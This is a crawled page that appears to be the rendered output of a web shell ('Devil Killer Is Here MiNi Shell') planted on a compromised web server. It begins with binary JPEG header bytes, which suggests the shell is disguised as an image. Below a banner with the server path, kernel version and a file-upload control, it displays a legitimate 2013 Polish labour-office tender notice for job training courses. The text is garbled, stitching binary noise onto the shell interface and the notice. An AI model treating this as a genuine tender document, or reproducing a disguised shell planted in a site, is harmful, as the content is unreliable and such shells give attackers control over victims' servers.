JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130805/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130805/314108-N-2013.html

<p class="kh_header"><b>Skarżysko-Kamienna: Usługa szkoleniowa polegająca na zorganizowaniu i przeprowadzeniu 7 szkoleń dla 57 osób bezrobotnych i poszukujących pracy zarejestrowanych w Powiatowym Urzędzie Pracy w Skarżysku-Kamiennej - uczestników Projektu systemowego Nowe Szanse w MOPS w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII, Działanie 7.1 Poddziałanie 7.1.1. współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego oraz  Projektu Kształcenie Inspiracja Szkolenie Priorytet VII w ramach Poddziałania 7.2.1</b><br>
<b>Numer ogłoszenia: 314108 - 2013; data zamieszczenia: 05.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. 1 Maja 105, 26-110 Skarżysko-Kamienna, woj. świętokrzyskie, tel. 041 25 17 300, faks 041 25 17 306.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://pup.skarzysko.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Powiatowa administracja zespolona.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa szkoleniowa polegająca na zorganizowaniu i przeprowadzeniu 7 szkoleń dla 57 osób bezrobotnych i poszukujących pracy zarejestrowanych w Powiatowym Urzędzie Pracy w Skarżysku-Kamiennej - uczestników Projektu systemowego Nowe Szanse w MOPS w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII, Działanie 7.1 Poddziałanie 7.1.1. współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego oraz  Projektu Kształcenie Inspiracja Szkolenie Priorytet VII w ramach Poddziałania 7.2.1.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa szkoleniowa polegająca na zorganizowaniu i przeprowadzeniu 7 szkoleń dla 57 osób bezrobotnych i poszukujących pracy zarejestrowanych w Powiatowym Urzędzie Pracy w Skarżysku-Kamiennej - uczestników Projektu systemowego Nowe Szanse w MOPS w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII, Działanie 7.1 Poddziałanie 7.1.1. współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego oraz Projektu Kształcenie Inspiracja Szkolenie Priorytet VII Promocja Integracji Społecznej w ramach Poddziałania 7.2.1. Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym.Zadanie nr 1: Kucharz z elementami cateringu i organizacją przyjęć okolicznościowych ( dla 7 osób); Zadanie  nr 2: Sprzedawca z obsługą kasy fiskalnej z minimum sanitarnym (dla 12 osób); Zadanie  nr 3: Opiekun osób starszych (dla 8 osób); Zadanie nr 4: Uprawnienia SEP do 1 kV (dla 1 osoby);Zadanie nr 5: Operator wózków jezdniowych z napędem silnikowym (dla 10 osób);Zadanie nr 6: Kosmetyczka z elementami wizażu i stylizacją paznokci (dla 9 osób);Zadanie nr 7: Nowoczesny sprzedawca - kasjer z minimum sanitarnym (dla 10 osób).Szkolenia zostaną współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego:
 -  Projekt systemowy Nowe szanse w MOPS Priorytet VII Promocja Integracji Społecznej w ramach Działania 7.1  Poddziałania 7.1.1. Rozwój i Kapitał Ludzki (zadania nr 1,2,3,4,5,6) 
 - Projekt Kształcenie Inspiracja Szkolenie Priorytet VII Promocja Integracji Społecznej w ramach Poddziałania 7.2.1. Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym (zadanie nr 7).
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku posiadania uprawnień do wykonywania określonej działalności lub czynności, Wykonawca składa oświadczenie, że posiada wpis do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej, zgodnie z art.20 ust.1 ustawy z dnia 20 kwietnia 2004r. o promocji zatrudnienia i instytucjach rynku pracy (Tekst jednolity: Dz.U. 2013r. poz. 674)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku posiadania wiedzy i doświadczenia, Wykonawca składa wykaz wykonanych głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane należycie. 
Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że zrealizował minimum jedno szkolenie dla danej części o tematyce:
dla zadania nr 1: Kucharz z elementami cateringu i organizacją przyjęć okolicznościowych ( dla min. 5 osób o wartości min. 5.000 zł); dla zadania nr 2: Sprzedawca z obsługą kasy fiskalnej z minimum sanitarnym ( dla min. 10 osób o wartości min.5.000,00 zł); dla zadania nr 3: Opiekun osób starszych (dla min. 5 osób o wartości min.5.000,00 zł); dla zadania nr 4: Uprawnienia SEP do 1 kV  (dla 1 osoby o  wartości min. 500,00 zł); dla zadania nr 5: Operator wózków jezdniowych z napędem silnikowym (dla min.  10 osób o wartości min. 4.000,00 zł); dla zadania nr 6: Kosmetyczka z elementami wizażu i stylizacją paznokci (dla min.  9 osób o wartości min. 5.000 zł); dla zadania nr 7: Nowoczesny sprzedawca - kasjer z minimum sanitarnym (dla min. 10 osób o wartości min.5.000,00 zł).
Zamawiający dopuści również szkolenia o tematyce zbliżonej. Przez tematykę zbliżoną należy rozumieć szkolenia których program i liczba godzin w 70% pokrywał się z tematem i liczbą godzin szkoleń będących przedmiotem zamówienia (w przypadku wątpliwości Wykonawca może zostać wezwany do przedłożenia programu zrealizowanego szkolenia)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia, Wykonawca składa wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami 
Na potwierdzenie spełnienia warunku należy przedstawić w formie wykazu następujące informacje: adres lokalu ze wskazaniem prawa do jego dysponowania, wskazanie ilości sal do zajęć z ilością miejsc, ilości pomieszczeń socjalnych oraz pomieszczeń sanitarnych. Minimalne wymagania lokalowe to: co najmniej jedna sala dydaktyczna dla każdej części odpowiadająca ilości osób wskazanych do szkolenia, z dostępem do zaplecza socjalnego 
i sanitarnego.
Ponadto;
-dla zadania nr 1 wymagany jest dostęp bez żadnych ograniczeń przez okres realizacji szkolenia 
do pracowni gastronomicznej lub restauracji
-dla zadania nr 6 wymagany jest dostęp bez żadnych ograniczeń przez okres realizacji szkolenia 
do pracowni kosmetycznej lub zakładu kosmetycznego.
Wykonawca, który składa ofertę na więcej niż jedną  część jest zobowiązany spełnić warunek dysponowania salą dydaktyczną oddzielnie dla każdej z części, jedną salą dydaktyczną można wykazać się do dwóch części. 
Wykonawca, jeżeli nie posiada własnej bazy lokalowej jest zobowiązany przedłożyć dokument (np. umowa najmu), potwierdzający że będzie dysponował tymi zasobami przez cały okres realizacji zamówienia bez żadnych ograniczeń. 
Ponadto wykaz ma zawierać :
w przypadku zadania nr 2 oraz nr 7  informację, że Wykonawca dysponuje co najmniej dwoma typami kas fiskalnych. Na jedną kasę fiskalną musi przypadać nie więcej niż jeden uczestnik szkolenia; 
w przypadku zadania nr 5 informację, że Wykonawca dysponuje wózkiem widłowym (napęd gazowy)- 1 szt., wózkiem widłowym (napęd spalinowy) - 1 szt., placem do nauki jazdy i manewrowania wózkiem widłowym. Należy określić typ, markę wózka oraz adres placu manewrowego</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku dysponowania osobami zdolnymi do wykonania zamówienia, Wykonawca składa wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia; (przez doświadczenie należy rozumieć udział, jako wykładowca/trener w co najmniej jednym zakończonym szkoleniu) oraz informacjami o podstawie do dysponowania tymi osobami. Potwierdzeniem spełniania warunku będzie przedstawienie wykazu zawierającego nie mniej niż: w przypadku zadania nr 1: Kucharz z elementami cateringu i organizacją przyjęć okolicznościowych - minimum 2 osoby z doświadczeniem w prowadzeniu zajęć na kursach kucharskich. Wszystkie z wymienionych osób muszą posiadać wykształcenie wyższe. Jedna z wymienionych osób musi posiadać przygotowanie pedagogiczne; w przypadku zadania nr 2: Sprzedawca z obsługą kasy fiskalnej z minimum sanitarnym - minimum 2 osoby z doświadczeniem w prowadzeniu szkoleń związanych ze sprzedażą. Wszystkie z wymienionych osób muszą posiadać wykształcenie wyższe. Jedna z wymienionych osób musi posiadać przygotowanie pedagogiczne; w przypadku zadania nr 3: Opiekun osób starszych -  minimum 2 osoby z doświadczeniem w prowadzeniu zajęć na kursach dla opiekunek. Wszystkie z wymienionych osób muszą posiadać wykształcenie wyższe.Jedna z wymienionych osób musi posiadać wykształcenie wyższe pedagogiczne oraz druga z wymienionych osób musi posiadać wykształcenie wyższe medyczne ; w przypadku zadania nr 4: Uprawnienia SEP do 1 kV - minimum 2 osoby z doświadczeniem w prowadzeniu zajęć w zakresie objętym szkoleniem. Wszystkie z wymienionych osób muszą posiadać wykształcenie wyższe oraz aktualne świadectwo kwalifikacyjne Stowarzyszenia Elektryków Polskich. Jedna z wymienionych osób musi posiadać przygotowanie pedagogiczne; w przypadku zadania nr 5: Operator wózków jezdniowych z napędem silnikowym -  minimum 2 osoby z uprawnieniami do szkolenia w zakresie obsługi wózków widłowych, doświadczenie w prowadzeniu szkoleń z zakresu obsługi wózków widłowych. Jedna z wymienionych osób musi posiadać przygotowanie pedagogiczne; w przypadku zadania nr 6: Kosmetyczka z elementami wizażu i stylizacją paznokci - minimum 2 osoby z doświadczeniem w prowadzeniu zajęć na kursach kosmetycznych. Wszystkie z wymienionych osób muszą posiadać wykształcenie wyższe. Jedna z wymienionych osób musi posiadać przygotowanie pedagogiczne; w przypadku zadania nr 7: Nowoczesny sprzedawca - kasjer z minimum sanitarnym - minimum 2 osoby z doświadczeniem w prowadzeniu szkoleń związanych ze sprzedażą. Wszystkie z wymienionych osób muszą posiadać wykształcenie wyższe. Jedna z wymienionych osób musi posiadać przygotowanie pedagogiczne</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku sytuacji ekonomicznej i finansowej należy przedstawić informację  banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej posiadanie środków finansowych w następujących wysokościach: dla zadania nr 1, 2, 3, 6 ,7  po 5.000,00 zł; dla zadania 4 - 500 zł  i dla zadania 5  - 4.000,00 zł lub zdolność kredytową wykonawcy w tej samej wysokości wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
Jeżeli wykonawca składa ofertę na więcej niż jedną cześć wartość ta podlega sumowaniu dla każdej części na którą składana jest oferta.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta zgodna z załączonym drukiem Formularza ofertowego - załącznik nr 2 do SIWZ; Oświadczenie o posiadaniu aktualnego zaświadczenia o wpisie do rejestru instytucji szkoleniowych wydane przez Wojewódzki Urząd Pracy- (załącznik nr 6 do SIWZ)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Doświadczenie Wykonawcy w organizacji szkoleń objętych zamówieniem - 25</li>
<li>3 - Posiadanie certyfikatu jakości usług - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się istotnych zmian postanowień zawartej umowy za wyjątkiem wystąpienia:
- zmiany kadry realizującej szkolenie w wyniku nieprzewidywalnych zdarzeń losowych (np. śmierć, choroba, rozwiązanie stosunku pracy), których nie można było przewidzieć w dniu zawarcia umowy. Wykonawca zobowiązany będzie zapewnić zastępstwo przez osobę lub osoby o właściwych uprawnieniach, wykształceniu
 i o doświadczeniu równym lub większym od doświadczenia osoby lub osób zastępowanych. Zastępca będzie mógł przystąpić do realizacji przedmiotu zamówienia przewidzianego w umowie po uzyskaniu przez Wykonawcę pisemnej zgody ze strony Zamawiającego. Występując z wnioskiem o zmianę kadry realizującej szkolenie, Wykonawca zobowiązany będzie wskazać: przyczyny niedostępności osoby/osób zastępowanej/ych; czynności, które będą przez tą osobę/y wykonywane; kogo będzie(ą) miała(y) zastąpić; okres zastępstwa;
- zmiany terminu trwania szkolenia wynikającą z przyczyn niezależnych od Wykonawcy;
- zmiany miejsca (adresu) wykonywania zamówienia z przyczyn niezależnych od Wykonawcy;
- zmiany harmonogramu zajęć z przyczyn niezależnych od Wykonawcy;
-zmiany ilości osób opisanych w przedmiocie zamówienia; Zamawiający informuje, że przy usłudze szkoleniowej opisanej w Załączniku nr 1 do SIWZ stosuje prawo opcji, oznacza to, że podane ilości osób są wielkościami maksymalnymi, które mogą ulec zmniejszeniu w trakcie realizacji zamówienia. Gwarantowana ilość uczestników szkolenia, które zostaną skierowane to w przypadku zadań nr 1,2,3,5,6,7  - 80% wskazanych osób na każde z tych szkoleń;
- wszelkie inne zmiany, których nie można było przewidzieć, a nie działają na szkodę Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pup.skarzysko.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Skarżysku-Kamiennej, ul. 1 Maja 105,   
26-110 Skarżysko-Kamienna.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.08.2013 godzina 08:00, miejsce: Powiatowy Urząd Pracy w Skarżysku-Kamiennej, ul. 1 Maja 105,  pokój nr 3 Biuro Podawcze (parter budynku) lub przesłać na adres Zamawiającego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy Nowe Szanse w MOPS realizowany w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII, Działanie 7.1 Poddziałanie 7.1.1. współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego oraz  Projekt Kształcenie Inspiracja Szkolenie, Priorytet VII Promocja Integracji Społecznej w ramach Poddziałania 7.2.1. Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
